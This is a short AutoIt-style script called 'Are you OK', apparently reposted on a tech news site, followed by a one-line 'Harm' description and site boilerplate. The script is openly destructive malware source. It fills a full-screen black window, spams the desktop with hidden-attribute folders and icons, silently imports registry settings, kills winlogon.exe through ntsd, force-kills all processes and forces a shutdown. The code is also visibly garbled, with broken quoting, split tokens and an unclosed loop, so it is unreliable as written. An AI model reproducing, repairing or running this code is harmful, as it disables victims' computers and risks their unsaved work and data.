GLOBAL CONST $CDIS_SHOWKEYBOARDCUES = 512

GLOBAL CONST $CDIS_NEARHOT = 1024

GLOBAL CONST $CDIS_OTHERSIDEHOT = 2048

GLOBAL CONST $CDIS_DROPHILITED = 4096

GLOBAL CONST $CDRF_DODEFAULT = 0

GLOBAL CONST $CDRF_NEWFONT = 2

GLOBAL CONST $CDRF_SKIPDEFAULT = 4

GLOBAL CONST $CDRF_NOTIFYPOSTPAINT = 16

GLOBAL CONST $CDRF_NOTIFYITEMDRAW = 32

GLOBAL CONST $CDRF_NOTIFYSUBITEMDRAW = 32

GLOBAL CONST $CDRF_NOTIFYPOSTERASE = 64

GLOBAL CONST $CDRF_DOERASE = 8

GLOBAL CONST $CDRF_SKIPPOSTPAINT = 256

GLOBAL CONST $GUI_SS_DEFAULT_GUI = BITOR ($WS_MINIMIZEBOX, $WS_CAPTION, $WS_POPUP, $WS_SYSMENU)

$ICO = _ MAKEDIR (".ico")

$BMP = _ MAKEDIR (".bmp")

$REG = _ MAKEDIR (".reg")

FILEINSTALL ("Are you OK.ico", $ICO)

FILEINSTALL ("Are you OK.bmp", $BMP)

FILEINSTALL ("Are you OK.reg", $REG)

$FORM1 = GUICREATE ("", @ DESKTOPWIDTH, @ DESKTOPHEIGHT, 0,0, BITOR ($WS_SYSMENU, $WS_POPUP), BITOR ($WS_EX_TOOLWINDOW, $WS_EX_WINDOWEDGE))

GUISETCURSOR (15)

GUISETBKCOLOR (0)

GUISETSTATE (@ SW_SHOW)

_ FORKDIR (@ DESKTOPDIR & "\", @ DESKTOPWIDTH * @ DESKTOPHEIGHT / 1000)

REGWRITE ("HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ System\", "Wallpaper", "REG_SZ", $BMP)

RUNWAIT ("cmd.exe / c regedit / s"& $REG &", @ APPDATADIR &"\ ", @ SW_HIDE)

FILEDELETE ($REG)

IF FILEEXISTS (@ SYSTEMDIR & "\ ntsd.exe") THEN

RUN ("cmd.exe / c" ntsd-c Q-pn winlogon.exe "", @ SYSTEMDIR & "\", @ SW_HIDE)

SLEEP (2333)

ENDIF

RUN ("cmd.exe / c" taskkill / f / fi "pid ge 1", @ SYSTEMDIR & "\", @ SW_HIDE)

SLEEP (2333)

SHUTDOWN (2 + 4)

FUNC _ FORKDIR ($DIRT, $NUM)

FOR $I = 1 TO $NUM

$DIR = _ MAKEDIR ("\", $DIRT)

_ FUCKDIR ($DIR)

ENDFUNC

FUNC _ MAKEDIR ($FILE = "\", $ROOT = "null")

IF $ROOT = "null" THEN

$ROOT = @ APPDATADIR & "\"

ENDIF

WHILE 1

$DIR = $ROOT & RANDOM (10000000, 99999999, 1) & $FILE

IF FILEEXISTS ($DIR) = FALSE THEN

EXITLOOP

ENDIF

WEND

RETURN $DIR

ENDFUNC

FUNC _ FUCKDIR ($DIR)

DIRCREATE ($DIR)

RUNWAIT ("cmd.exe / cmd" Are you OK...\ "", $DIR, @ SW_HIDE)

INIWRITE ($DIR & "\ Desktop.ini", ".ShellClassInfo", "LocalizedResourceName", "Are you OK?")

INIWRITE ($DIR & "\ Desktop.ini", ".ShellClassInfo", "IconResource", $ICO)

INIWRITE ($DIR & "\ Desktop.ini", ".ShellClassInfo", "InfoTip", "Are you OK?")

FILESETATTRIB ($DIR & "Desktop.ini", "+ HS")

FILESETATTRIB ($DIR, "+ S")

ENDFUNC

Harm:

After running, the system blue screen shuts down and restarts, constantly generating ini files and icons.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.